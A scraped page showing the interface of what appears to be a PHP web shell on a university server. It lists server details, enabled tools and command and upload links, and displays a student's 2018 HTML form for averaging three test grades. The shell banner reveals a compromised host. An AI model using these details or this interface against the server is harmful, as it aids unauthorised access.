Server IP : 172.16.15.8 / Your IP : 18.117.75.53 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jeficklin/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- File name: Test_Averager.html Assigment 2.c Due: Feb. 13, 2018 Author: James Ficklin Goal: Design a form that will take in three test grades and a name and display the name and the average. --> <!-- Test_Averager.html --> <CENTER> <H2> Please input your name and three test grades. </H2> <HR> <FORM action=Test_Averager.php method=post> Name? <INPUT type=text name=Name> <P> Test 1? <INPUT type=text name=T1> <P> Test 2? <INPUT type=text name=T2> <P> Test 3? <INPUT type=text name=T3> <P> <P> <INPUT type=submit value="Submit Form"> <INPUT type=reset value="Reset Form"> </FORM> </CENTER>